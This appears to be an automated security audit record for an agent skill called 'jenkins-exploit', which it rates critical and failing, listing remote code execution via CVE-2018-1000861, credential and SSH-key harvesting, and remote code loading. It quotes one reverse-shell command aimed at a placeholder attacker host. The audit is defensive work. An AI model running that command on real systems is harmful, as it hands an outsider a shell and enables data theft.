jenkins-exploit
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides scripts to achieve remote code execution by exploiting CVE-2018-1000861 and the Jenkins Script Console.\n- [COMMAND_EXECUTION]: Includes specific system command payloads, including a functional reverse shell string:
"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1".\n- [DATA_EXFILTRATION]: Provides code and documentation for harvesting sensitive files (e.g., SSH keys, /etc/shadow) and dumping Jenkins' internal credential store.\n- [EXTERNAL_DOWNLOADS]: Explains how to use Groovy's@Grabannotation to load and execute code from remote Maven repositories.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
Audit Metadata